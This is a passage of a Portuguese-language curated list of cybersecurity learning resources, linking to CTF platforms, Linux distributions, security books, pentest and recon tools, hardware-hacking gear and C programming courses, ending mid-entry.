[Bancocn](https://bancocn.com/) - [CTF Komodo Security](https://ctf.komodosec.com/) - [CryptoHack](https://cryptohack.org/) - [CMD Challenge](https://cmdchallenge.com/http://overthewire.org/) - [Explotation Education](https://exploit.education/) - [Google CTF](https://lnkd.in/e46drbz8) - [Hackthis](https://www.hackthis.co.uk/) - [Hacksplaining](https://lnkd.in/eAB5CSTA) - [Hacker Security](https://lnkd.in/ex7R-C-e) - [Hacking-Lab](https://hacking-lab.com/) - [HSTRIKE](https://hstrike.com/) - [ImmersiveLabs](https://immersivelabs.com/) - [NewbieContest](https://lnkd.in/ewBk6fU5) - [OverTheWire](http://overthewire.org/) - [Practical Pentest Labs](https://lnkd.in/esq9Yuv5) - [Pentestlab](https://pentesterlab.com/) - [Hackaflag BR](https://hackaflag.com.br/) - [Penetration Testing Practice Labs](https://lnkd.in/e6wVANYd) - [PWNABLE](https://lnkd.in/eMEwBJzn) - [Root-Me](https://www.root-me.org/) - [Root in Jail](http://rootinjail.com/) - [SANS Challenger](https://lnkd.in/e5TAMawK) - [SmashTheStack](https://lnkd.in/eVn9rP9p) - [The Cryptopals Crypto Challenges](https://cryptopals.com/) - [W3Challs](https://w3challs.com/) - [WeChall](http://www.wechall.net/) - [Zenk-Security](https://lnkd.in/ewJ5rNx2) - [Cyber Defenders](https://lnkd.in/dVcmjEw8) - [LetsDefend](https://letsdefend.io/) - [Vulnmachines](https://vulnmachines.com/) - [Rangeforce](https://www.rangeforce.com/) - [Ctftime](https://ctftime.org/) - [Pwn college](https://dojo.pwn.college/) - [Free Money CTF](https://bugbase.in/) - [PortSwigger Web Security Academy](https://portswigger.net/web-security) - [OWASP Juice Shop](https://owasp.org/www-project-juice-shop/) - [XSSGame](https://xss-game.appspot.com/) - [BugBountyHunter](https://www.bugbountyhunter.com/) - [DVWA](https://dvwa.co.uk/) - [bWAPP](http://www.itsecgames.com/) - [Metasploitable2](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/) ## 🐧 Distros de Linux - [Parrot Security](https://www.parrotsec.org/) - Distribuição Parrot SecurityOS - [Kali Linux](https://www.kali.org) - Distribuição Linux Kali Linux - [Black Arch Linux](https://blackarch.org/) - Distribuição Black Arch - [Arch Linux](https://archlinux.org/) - Distribuição Linux Arch Linux - [Pop!\_Os](https://pop.system76.com/) - Distribuição Linux Pop!\_Os - [Debian](https://www.debian.org/) - Distribuição Linux Debian - [Ubuntu](https://ubuntu.com/) - Distribuição Linux Ubuntu - [Fedora](https://getfedora.org/pt_BR/) - Distribuição Linux Fedora - [Linux Mint](https://linuxmint.com/) - Distribuição Linux Mint - [OpenSUSE](https://www.opensuse.org) - Distribuição Linux OpenSUS - [KDE Neon](https://www.neon.kde.org) - Distribuição Linux KDE Neon - [Solus](https://www.getsol.us) - Distribuição Linux Solus - [Tails](https://www.tails.boum.org) - Distribuição Linux Tails - [Zorin OS](https://zorin.com/os/) - Distribuição Linux Zorin - [Kubuntu](https://kubuntu.org/) - Distribuição Linux Kubuntu ## 💻 Máquinas Virtuais - [Oracle VM VirtualBox](https://www.virtualbox.org/) - [VMware Workstation](https://www.vmware.com/br/products/workstation-player/workstation-player-evaluation.html) - [VMware Workstation Player](https://www.vmware.com/products/workstation-player.html) - [VMware Fusion](https://www.vmware.com/br/products/fusion.html) - [Vagrant](https://www.vagrantup.com/) ## 💰 Sites de Bug Bounty - [Bug Crowd - Bug Bounty List](https://www.bugcrowd.com/bug-bounty-list/) ## 🦤 Perfis no Twitter - [Ben Sadeghipour](https://twitter.com/NahamSec) - [STÖK](https://twitter.com/stokfredrik) - [TomNomNom](https://twitter.com/TomNomNom) - [Shubs](https://twitter.com/infosec_au) - [Emad Shanab](https://twitter.com/Alra3ees) - [Payloadartist](https://twitter.com/payloadartist) - [Remon](https://twitter.com/remonsec) - [Aditya Shende](https://twitter.com/ADITYASHENDE17) - [Hussein Daher](https://twitter.com/HusseiN98D) - [The XSS Rat](https://twitter.com/theXSSrat) - [zseano](https://twitter.com/zseano) - [based god](https://twitter.com/hacker) - [Vickie Li](https://twitter.com/vickieli7) - [GodFather Orwa](https://twitter.com/GodfatherOrwa) - [Ashish Kunwar](https://twitter.com/D0rkerDevil) - [Farah Hawa](https://twitter.com/Farah_Hawaa) - [Jason Haddix](https://twitter.com/Jhaddix) - [Brute Logic](https://twitter.com/brutelogic) - [Bug Bounty Reports Explained](https://twitter.com/gregxsunday) ## ✨ Perfis no Instagram - [Hacking na Web (Rafael Sousa)](https://www.instagram.com/hackingnaweboficial/) - [Acker Code | Tech & Ethical Hacking](https://www.instagram.com/ackercode/) - [Hacking Club by Crowsec EdTech](https://www.instagram.com/hackingclub.io/) - [Hacking Esports](https://www.instagram.com/hackingesports/) - [XPSec | Pentest & Hacking](https://www.instagram.com/xpsecsecurity/) - [Hérika Ströngreen | Hacking](https://www.instagram.com/herikastrongreen/) - [Linux e Hacking](https://www.instagram.com/linux.gnu/) - [Njay | Ethical Hacking](https://www.instagram.com/bountyhawk/) - [Cyber Security/Ethical Hacking](https://www.instagram.com/thecyberw0rld/) - [Load The Code](https://www.instagram.com/load_thecode/) - [Learn ethical hacking](https://www.instagram.com/learn_hacking4/) - [Cyber TechQ](https://www.instagram.com/cyber.techq/) - [The Cyber Security Hub™](https://www.instagram.com/thecybersecurityhub/) - [Darshit Pandey | Cyber Security](https://www.instagram.com/cyberrabitx/) - [Harsha | Cyber Security](https://www.instagram.com/cyberrpreneur/) ## 🎇 Comunidades no Reddit - [Cyber Security](https://www.reddit.com/r/cybersecurity/) - [Hacking: security in practice](https://www.reddit.com/r/hacking/) - [A forum for the security professionals and white hat hackers.](https://www.reddit.com/r/Hacking_Tutorials/) - [Cybersecurity Career Discussion](https://www.reddit.com/r/CyberSecurityJobs/) - [AskNetsec](https://www.reddit.com/r/AskNetsec/) - [Subreddit for students studying Network Security](https://www.reddit.com/r/netsecstudents/) - [Cyber Security Fórum](https://www.reddit.com/r/cyber_security/) - [Reverse Engineering](https://www.reddit.com/r/ReverseEngineering/) - [Red Team Security](https://www.reddit.com/r/redteamsec/) - [Blue Team Security](https://www.reddit.com/r/blueteamsec/) - [Purple Team Security](https://www.reddit.com/r/purpleteamsec/) ## 🌌 Comunidades no Discord - [Boitatech](https://discord.gg/6bqBdyJ9PA) - [Mente Binaria](https://menteb.in/discord) - [Guia Anônima ](https://discord.gg/GzrMtXvuAM) - [Comunidade Conecta](https://discord.gg/3hWYewJemP) - [Central Help CTF](https://discord.gg/5xWJBXSaJe) - [Menina do CyberSec](https://discord.gg/aCSxhGK6hK) - [Hack4u](https://discord.gg/U84pHspusM) - [Spyboy Cybersec](https://discord.gg/3mt6H67jjQ) - [Ninjhacks Community](https://discord.gg/KkTxuWb4VX) - [Code Society](https://discord.gg/pGHFyMZa46) - [WhiteHat Hacking](https://discord.gg/XpmjtEGYYk) - [Hacking & Coding](https://discord.gg/KawfcEnbXX) - [Red Team Village](https://discord.gg/redteamvillage) - [TryHackMe](https://discord.gg/JqAn7NNTtF) - [DC Cyber Sec](https://discord.gg/dccybersec) - [Try Hard Security](https://discord.gg/tryhardsecurity) - [Linux Chat](https://discord.gg/linuxchat) - [Cyber Jobs Hunting](https://discord.gg/SsBzsuQGBh) - [NSL - Community](https://discord.gg/jhMuTYTNZv) - [HackTheBox](https://discord.gg/hackthebox) - [eLeanSecurity](https://discord.gg/F88c9XWQvM) - [3DLock](https://discord.gg/rqsTBxxuGw) - [Code Red](https://discord.gg/yYCRAApxwf) - [The Cyber Council](https://discord.gg/CjYTbQTjQH) - [Certification Station](https://discord.gg/certstation) - [Bounty Hunters](https://discord.gg/AUFTZ5EkPZ) - [Tech Raven](https://discord.gg/TFPuaXkweR) - [The Cybersecurity Club](https://discord.gg/B4Av7acqXp) - [ImaginaryCTF](https://discord.gg/M9J6GdqrE4) - [Hack This Site](https://discord.gg/hts) - [Cyber Badgers](https://discord.gg/wkXF9Gc44R) - [TheBlackSide](https://discord.gg/pUeuzxvft7) ## 📚 Recomendações de livros > Recomendação de livros para aprimoramento do conhecimento em Cyber Security em Português - [Introdução ao Pentest](https://www.amazon.com.br/Introdu%C3%A7%C3%A3o-ao-Pentest-Daniel-Moreno/dp/8575228072/ref=asc_df_8575228072/?tag=googleshopp00-20&linkCode=df0&hvadid=379773616949&hvpos=&hvnetw=g&hvrand=3870620309104752989&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-850530960141&psc=1) - [Pentest em Aplicações web](https://www.amazon.com.br/Pentest-Aplica%C3%A7%C3%B5es-Web-Daniel-Moreno/dp/8575226134/ref=pd_bxgy_img_sccl_1/145-1578869-2329559?pd_rd_w=2dTdj&content-id=amzn1.sym.57f5b0c5-8f2e-45a4-8595-2eb0fcbe85cd&pf_rd_p=57f5b0c5-8f2e-45a4-8595-2eb0fcbe85cd&pf_rd_r=DSSS27BQRN1MT8XSNT55&pd_rd_wg=smd9N&pd_rd_r=cc5197e3-0659-4e91-98fd-07a7b7b3c6aa&pd_rd_i=8575226134&psc=1) - [Pentest em Redes sem fio](https://www.amazon.com.br/Pentest-em-Redes-sem-Fio/dp/8575224832/ref=pd_bxgy_img_sccl_2/145-1578869-2329559?pd_rd_w=2dTdj&content-id=amzn1.sym.57f5b0c5-8f2e-45a4-8595-2eb0fcbe85cd&pf_rd_p=57f5b0c5-8f2e-45a4-8595-2eb0fcbe85cd&pf_rd_r=DSSS27BQRN1MT8XSNT55&pd_rd_wg=smd9N&pd_rd_r=cc5197e3-0659-4e91-98fd-07a7b7b3c6aa&pd_rd_i=8575224832&psc=1) - [Exploração de vulnerabilidades em redes TCP/IP](https://www.amazon.com.br/Explora%C3%A7%C3%A3o-vulnerabilidade-Rede-TCP-IP/dp/8550800708/ref=asc_df_8550800708/?tag=googleshopp00-20&linkCode=df0&hvadid=379765802390&hvpos=&hvnetw=g&hvrand=3870620309104752989&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-423299859071&psc=1) - [Algoritmos de Destruição em Massa](https://www.amazon.com.br/Algoritmos-Destrui%C3%A7%C3%A3o-Massa-Cathy-ONeil/dp/6586460026/ref=asc_df_6586460026/?tag=googleshopp00-20&linkCode=df0&hvadid=379792431986&hvpos=&hvnetw=g&hvrand=3870620309104752989&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-1007895878384&psc=1) - [Kali Linux. Introdução ao Penetration Testing](https://www.amazon.com.br/Kali-Linux-Introdu%C3%A7%C3%A3o-Penetration-Testing/dp/8539906236/ref=asc_df_8539906236/?tag=googleshopp00-20&linkCode=df0&hvadid=379787347388&hvpos=&hvnetw=g&hvrand=3870620309104752989&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-421604521830&psc=1) - [Criptografia e Segurança de Redes: Princípios e Práticas](https://www.amazon.com.br/Criptografia-seguran%C3%A7a-redes-princ%C3%ADpios-pr%C3%A1ticas/dp/8543005892/ref=asc_df_8543005892/?tag=googleshopp00-20&linkCode=df0&hvadid=379792581512&hvpos=&hvnetw=g&hvrand=3870620309104752989&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-810094894442&psc=1) - [Análise de Tráfego em Redes TCP/IP: Utilize Tcpdump na Análise de Tráfegos em Qualquer Sistema Operacional](https://www.amazon.com.br/An%C3%A1lise-Tr%C3%A1fego-Redes-TCP-IP/dp/8575223755/ref=asc_df_8575223755/?tag=googleshopp00-20&linkCode=df0&hvadid=379818494621&hvpos=&hvnetw=g&hvrand=3870620309104752989&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-396355445891&psc=1) - [Segurança de computadores e teste de invasão](https://www.amazon.com.br/Seguran%C3%A7a-computadores-teste-invas%C3%A3o-Alfred/dp/8522117993/ref=asc_df_8522117993/?tag=googleshopp00-20&linkCode=df0&hvadid=379765802390&hvpos=&hvnetw=g&hvrand=3870620309104752989&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-394932359707&psc=1) - [Ransomware: Defendendo-se da Extorsão Digital](https://www.amazon.com.br/Ransomware-Defendendo-Se-Extors%C3%A3o-Allan-Liska/dp/8575225510/ref=asc_df_8575225510/?tag=googleshopp00-20&linkCode=df0&hvadid=379818494621&hvpos=&hvnetw=g&hvrand=3870620309104752989&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-812784633318&psc=1) - [Fundamentos de Segurança da Informação: com Base na ISO 27001 e na ISO 27002](https://www.amazon.com.br/Fundamentos-Seguran%C3%A7a-Informa%C3%A7%C3%A3o-27001-27002/dp/8574528609/ref=asc_df_8574528609/?tag=googleshopp00-20&linkCode=df0&hvadid=379787347388&hvpos=&hvnetw=g&hvrand=3870620309104752989&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-809202559856&psc=1) - [Testes de Invasão: uma Introdução Prática ao Hacking](https://www.amazon.com.br/Testes-Invas%C3%A3o-Georgia-Weidman/dp/8575224077/ref=asc_df_8575224077/?tag=googleshopp00-20&linkCode=df0&hvadid=379739109739&hvpos=&hvnetw=g&hvrand=3870620309104752989&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-332577553663&psc=1) - [CISEF - Segurança Cibernética: Uma Questão de Sobrevivência](https://www.amazon.com.br/CISEF-Seguran%C3%A7a-Cibern%C3%A9tica-Quest%C3%A3o-Sobreviv%C3%AAncia/dp/B097TPYCGG/ref=asc_df_B097TPYCGG/?tag=googleshopp00-20&linkCode=df0&hvadid=379715964603&hvpos=&hvnetw=g&hvrand=3870620309104752989&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-1430488033379&psc=1) - [Black Hat Python: Programação Python Para Hackers e Pentesters](https://www.amazon.com.br/Black-Hat-Python-Justin-Seitz/dp/8575224204) > Recomendação de livros para aprimoramento do conhecimento em Cyber Security em Inglês - [Hacking: The Art of Exploitation](https://www.amazon.com.br/Hacking-Exploitation-CDROM-Jon-Erickson/dp/1593271441) - [Penetration Testing: A Hands-On Introduction to Hacking](https://www.amazon.com.br/Penetration-Testing-Hands-Introduction-Hacking/dp/1593275641) - [The Hacker Playbook 2: Practical Guide to Penetration Testing](https://www.amazon.com.br/Hacker-Playbook-Practical-Penetration-Testing/dp/1512214566) - [The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy](https://www.amazon.com.br/Basics-Hacking-Penetration-Testing-Ethical/dp/0124116442) - [The Hacker Playbook 3: Practical Guide To Penetration Testing](https://www.amazon.com.br/Hacker-Playbook-Practical-Penetration-Testing-ebook/dp/B07CSPFYZ2) - [The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws](https://www.amazon.com.br/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470) - [Web Hacking 101](https://www.goodreads.com/book/show/33596532-web-hacking-101) - [Mastering Modern Web Penetration Testing](https://www.amazon.com.br/Mastering-Modern-Penetration-Testing-English-ebook/dp/B01GVMSTEO) - [Bug Bounty Playbook](https://payhip.com/b/wAoh) - [Real-World Bug Hunting: A Field Guide to Web Hacking](https://www.amazon.com.br/Real-World-Bug-Hunting-Field-Hacking/dp/1593278616) - [OWASP Testing Guide V10](https://owasp.org/www-project-web-security-testing-guide/assets/archive/OWASP_Testing_Guide_v4.pdf) - [Black Hat Python: Python Programming for Hackers and Pentesters](https://www.amazon.com.br/Black-Hat-Python-Programming-Pentesters/dp/1593275900/ref=asc_df_1593275900/?tag=googleshopp00-20&linkCode=df0&hvadid=379726160779&hvpos=&hvnetw=g&hvrand=12817915842755546773&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-406163956473&psc=1) - [Black Hat Python, 2nd Edition: Python Programming for Hackers and Pentesters](https://www.amazon.com.br/Black-Hat-Python-2nd-Programming/dp/1718501129/ref=asc_df_1718501129/?tag=googleshopp00-20&linkCode=df0&hvadid=379787788238&hvpos=&hvnetw=g&hvrand=12817915842755546773&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-1129943149832&psc=1) - [Black Hat Go: Go Programming for Hackers and Pentesters](https://www.amazon.com.br/Black-Hat-Go-Programming-Pentesters/dp/1593278659/ref=asc_df_1593278659/?tag=googleshopp00-20&linkCode=df0&hvadid=379787788238&hvpos=&hvnetw=g&hvrand=12817915842755546773&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-872661430541&psc=1) - [Advanced Penetration Testing: Hacking the World's Most Secure Networks](https://www.amazon.com.br/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689) - [Gray Hat Hacking: The Ethical Hacker's Handbook ](https://www.amazon.com.br/Gray-Hat-Hacking-Ethical-Handbook/dp/0072257091) - [Social Engineering: The Art of Human Hacking](https://www.amazon.com.br/Social-Engineering-Art-Human-Hacking/dp/0470639539) - [Social Engineering: The Science of Human Hacking](https://www.amazon.com.br/Social-Engineering-Science-Human-Hacking/dp/111943338X/ref=asc_df_111943338X/?tag=googleshopp00-20&linkCode=df0&hvadid=379726160779&hvpos=&hvnetw=g&hvrand=10534013289063384157&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-490758470823&psc=1) - [Practical Social Engineering: A Primer for the Ethical Hacker](https://www.amazon.com.br/Practical-Social-Engineering-Joe-Gray/dp/171850098X/ref=asc_df_171850098X/?tag=googleshopp00-20&linkCode=df0&hvadid=379735814613&hvpos=&hvnetw=g&hvrand=10534013289063384157&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-934732928526&psc=1) - [Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software](https://www.amazon.com.br/Practical-Malware-Analysis-Hands-Dissecting/dp/1593272901/ref=asc_df_1593272901/?tag=googleshopp00-20&linkCode=df0&hvadid=379735814613&hvpos=&hvnetw=g&hvrand=18239998534715401467&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-406163956073&psc=1) - [Practical Binary Analysis: Build Your Own Linux Tools for Binary Instrumentation, Analysis, and Disassembly](https://www.amazon.com.br/Practical-Binary-Analysis-Instrumentation-Disassembly/dp/1593279124/ref=asc_df_1593279124/?tag=googleshopp00-20&linkCode=df0&hvadid=379726160779&hvpos=&hvnetw=g&hvrand=18239998534715401467&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-525099683939&psc=1) - [Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats](https://www.amazon.com.br/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164/ref=asc_df_1593277164/?tag=googleshopp00-20&linkCode=df0&hvadid=379735814613&hvpos=&hvnetw=g&hvrand=18239998534715401467&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-326856398373&psc=1) - [Malware Data Science: Attack Detection and Attribution](https://www.amazon.com.br/Malware-Data-Science-Detection-Attribution/dp/1593278594/ref=asc_df_1593278594/?tag=googleshopp00-20&linkCode=df0&hvadid=379726160779&hvpos=&hvnetw=g&hvrand=18239998534715401467&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-526160276073&psc=1) - [The Art of Mac Malware: The Guide to Analyzing Malicious Software](https://www.amazon.com.br/Art-Mac-Malware-Analyzing-Malicious/dp/1718501943/ref=asc_df_1718501943/?tag=googleshopp00-20&linkCode=df0&hvadid=379726160779&hvpos=&hvnetw=g&hvrand=18239998534715401467&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-1435226984335&psc=1) - [Android Hacker's Handbook](https://www.amazon.com.br/Android-Hackers-Handbook-Joshua-Drake/dp/111860864X/ref=asc_df_111860864X/?tag=googleshopp00-20&linkCode=df0&hvadid=379735814613&hvpos=&hvnetw=g&hvrand=18239998534715401467&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=1001506&hvtargid=pla-459716102046&psc=1) - [Metasploit: The Penetration Tester's Guide](https://www.amazon.com.br/Metasploit-Penetration-Testers-David-Kennedy/dp/159327288X) - [Rtfm: Red Team Field Manual](https://www.amazon.com.br/Rtfm-Red-Team-Field-Manual/dp/1494295504) - [Blue Team Field Manual (BTFM)](https://www.amazon.com.br/Blue-Team-Field-Manual-Btfm/dp/154101636X) ## 🛠️ Frameworks e ferramentas de Hacking Web - [Burp Suite](https://portswigger.net/burp) - Framework. - [ZAP Proxy](https://www.zaproxy.org/) - Framework. - [Dirsearch](https://github.com/maurosoria/dirsearch) - HTTP bruteforcing. - [Nmap](https://nmap.org/) - Port scanning. - [Sublist3r](https://github.com/aboul3la/Sublist3r) - Subdomain discovery. - [Amass](https://github.com/OWASP/Amass) - Subdomain discovery. - [SQLmap](https://sqlmap.org/) - SQLi exploitation. - [Metasploit](https://www.metasploit.com/) - Framework - [WPscan](https://wpscan.com/wordpress-security-scanner) - WordPress exploitation. - [Nikto](https://github.com/sullo/nikto) - Webserver scanning. - [HTTPX](https://github.com/projectdiscovery/httpx) - HTTP probing. - [Nuclei](https://github.com/projectdiscovery/nuclei) - YAML based template scanning. - [FFUF](https://github.com/ffuf/ffuf) - HTTP probing. - [Subfinder](https://github.com/projectdiscovery/subfinder) - Subdomain discovery. - [Masscan](https://github.com/robertdavidgraham/masscan) - Mass IP and port scanner. - [Lazy Recon](https://github.com/nahamsec/lazyrecon) - Subdomain discovery. - [XSS Hunter](https://xsshunter.com/) - Blind XSS discovery. - [Aquatone](https://github.com/michenriksen/aquatone) - HTTP based recon. - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - Endpoint discovery through JS files. - [JS-Scan](https://github.com/0x240x23elu/JSScanner) - Endpoint discovery through JS files. - [Parameth](https://github.com/maK-/parameth) - Bruteforce GET and POST parameters. - [truffleHog](https://github.com/trufflesecurity/trufflehog) - Encontrar credenciais em commits do GitHub. ## 🪓 Ferramentas para obter informações - [theHarvester](https://github.com/laramies/theHarvester) - E-mails, subdomínios e nomes Harvester. - [CTFR](https://github.com/UnaPibaGeek/ctfr) - Abusando de logs de transparência de certificado para obter subdomínios de sites HTTPS. - [Sn1per](https://github.com/1N3/Sn1per) - Scanner automatizado de reconhecimento de pentest. - [RED Hawk](https://github.com/Tuhinshubhra/RED_HAWK) - Tudo em uma ferramenta para coleta de informações, verificação de vulnerabilidades e rastreamento. Uma ferramenta obrigatória para todos os testadores de penetração. - [Infoga](https://github.com/m4ll0k/Infoga) - Coleta de informações de e-mail. - [KnockMail](https://github.com/4w4k3/KnockMail) - Verifique se o endereço de e-mail existe. - [a2sv](https://github.com/hahwul/a2sv) - Verificação automática para vulnerabilidade SSL. - [Wfuzz](https://github.com/xmendez/wfuzz) - Fuzzer de aplicativos da web. - [Nmap](https://github.com/nmap/nmap) - Uma ferramenta muito comum. Host de rede, vuln e detector de porta. - [PhoneInfoga](https://github.com/sundowndev/PhoneInfoga) - Uma estrutura OSINT para números de telefone. ## 🔧 Ferramentas para Pentesting - [Pentest Tools](https://github.com/gwen001/pentest-tools) - [Hacktronian Tools](https://github.com/thehackingsage/hacktronian) - [Linux Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration) - [Infection Monkey](https://github.com/guardicore/monkey) - [Xerror](https://github.com/Chudry/Xerror) - [Mongoaudit](https://github.com/stampery/mongoaudit) - [Pentesting Scripts](https://github.com/killswitch-GUI/PenTesting-Scripts) - [TxTool](https://github.com/kuburan/txtool) - [All Pentesting Tools](https://github.com/nullsecuritynet/tools) ## 🔨 Ferramentas para Hardware Hacking - [Multímetro Digital](http://s.click.aliexpress.com/e/_d8he3mb) - [Módulo conversor FT232RL Usb para TTL](http://s.click.aliexpress.com/e/_dSIAjWL) - [Ch341A](http://s.click.aliexpress.com/e/_d62fRI3) - [Bus Pirate](http://s.click.aliexpress.com/e/_dUPIrJ9) - [SOP8 Clip](http://s.click.aliexpress.com/e/_dVZ9XFN) - [Arduino Uno R3](http://s.click.aliexpress.com/e/_dW85MoT) - [Osciloscópio Instrustar](http://s.click.aliexpress.com/e/_d80YjJl) - [Arduino Nano](http://s.click.aliexpress.com/e/_dZj36oL) - [Arduino Uno R3](http://s.click.aliexpress.com/e/_dXsrRxz) - [Arduino Pro Micro](http://s.click.aliexpress.com/e/_dSSuhuX) - [Esp8266](http://s.click.aliexpress.com/e/_dVzK5qj) - [Esp32](http://s.click.aliexpress.com/e/_d7orFfH) - [Arduino Micro SS](http://s.click.aliexpress.com/e/_d8Vrda3) - [Digispark](http://s.click.aliexpress.com/e/_dZfgtbl) - [Proxmark3](http://s.click.aliexpress.com/e/_dUTFHmL) - [Gravador de RFID](http://s.click.aliexpress.com/e/_dTFhbsX) - [Esp8266](http://s.click.aliexpress.com/e/_d8lGkzd) - [Analisador Lógico](http://s.click.aliexpress.com/e/_d9e9PDD) - [Raspberry Pi 0 W](http://s.click.aliexpress.com/e/_Bf7UqZxN) - [Pickit 3]( http://s.click.aliexpress.com/e/_dYwoTqL) - [Ft232h](http://s.click.aliexpress.com/e/_dUpL9XN) - [Ft232h](http://s.click.aliexpress.com/e/_dVVWLrH) - [M5stickC](http://s.click.aliexpress.com/e/_dVbh4T1) - [M5 Atom](http://s.click.aliexpress.com/e/_dTaCid5) - [Testador de componentes](http://s.click.aliexpress.com/e/_dUBXjzt) - [Projeto de testador de componentes](http://s.click.aliexpress.com/e/_d6tbMnv) - [Microscópio](http://s.click.aliexpress.com/e/_dZQ8RIj) - [Ferro de solda TS100](http://s.click.aliexpress.com/e/_d82rnhh) - [RT809h](https://pt.aliexpress.com/item/32747164846.html?spm=a2g0o.productlist.0.0.25cc3923P5cVXZ&algo_pvid=4d740e28-334f-43e9-938d-aee16699cc41&algo_expid=4d740e28-334f-43e9-938d-aee16699cc41-8&btsid=0ab6f82c15912356671523042efcb7&ws_ab_test=searchweb0_0,searchweb201602_,searchweb201603_) - [RTL-SDR](http://s.click.aliexpress.com/e/_dUIw0ll) - [Hackrf + Portapack h2](http://s.click.aliexpress.com/e/_dS0V9kf) ## 🦉 Sites e cursos para aprender C > Cursos para aprender C em Português - [Curso de C - eXcript](https://www.youtube.com/playlist?list=PLesCEcYj003SwVdufCQM5FIbrOd0GG1M4) - [Programação Moderna em C - Papo Binário](https://www.youtube.com/playlist?list=PLIfZMtpPYFP5qaS2RFQxcNVkmJLGQwyKE) - [Curso de Linguagem C - Pietro Martins](https://www.youtube.com/playlist?list=PLpaKFn4Q4GMOBAeqC1S5_Fna_Y5XaOQS2) - [Curso de Programação C Completo - Programe seu futuro](https://www.youtube.com/playlist?list=PLqJK4Oyr5WSjjEQCKkX6oXFORZX7ro3DA) - [Linguagem C - De aluno para aluno](https://www.youtube.com/playlist?list=PLa75BYTPDNKZWYypgOFEsX3H2Mg-SzuLW) - [Curso de Linguagem C para Iniciantes - John Haste](https://www.youtube.com/playlist?list=PLGgRtySq3SDMLV8ee7p-rA9y032AU3zT8) - [Curso de Linguagem C (ANSI)](https://www.youtube.com/playlist?list=PLZ8dBTV2_5HTGGtrPxDB7zx8J5VMuXdob) - [Curso - Programação com a Linguagem C para iniciantes](https://www.youtube.com/playlist?list=PLbEOwbQR9lqxHno2S-IiG9-lePyRNOO_E) - [Curso de Programação 3 (C Avançado)](https://www.youtube.com/playlist?list=PLxMw67OGLa0kW_TeweK2-9gXRlMLYzC1o) - [Curso de C - Diego Moisset](https://www.youtube.com/playlist?list=PLIygiKpYTC_6zHLTjI6cFIRZm1BCT3CuV) - [Curso de C e C++](https://www.youtube.com/playlist?list=PL5EmR7zuTn_bONyjFxSO4ZCE-SVVNFGkS) - [Curso de Programação em Linguagem C](https://www.youtube.com/playlist?list=PLucm8g_ezqNqzH7SM0XNjsp25AP0MN82R) - [Linguagem C - Curso de Programação Completo para Iniciantes e Profissionais](https://www.youtube.com/playlist?list=PLrqNiweLEMonijPwsHckWX7fVbgT2jS3P) - [Curso de Lógica e programação em C](https://www.youtube.com/playlist?list=PLtnFngjANe7EMzARU48QgecpyQdzWapoT) > Cursos para aprender C em Inglês - [C Programming for Beginners](https://www.youtube.com/playlist?list=PL98qAXLA6aftD9ZlnjpLhdQAOFI8xIB6e) - [C Programming - Neso Academy](https://www.youtube.com/playlist?list=PLBlnK6fEyqRggZZgYpPMUxdY1CYkZtARR) - [C Programming & Data Structures](https://www.youtube.com/playlist?list=PLBlnK6fEyqRhX6r2uhhlubuF5QextdCSM) - [Programming in C - Jennys](https://www.youtube.com/playlist?list=PLdo5W4Nhv31a8UcMN9-35ghv8qyFWD9_S) - [C Language Tutorials In Hindi](https://www.youtube.com/playlist?list=PLu0W_9lII9aiXlHcLx-mDH1Qul38wD3aR) - [freeCodeCamp C / 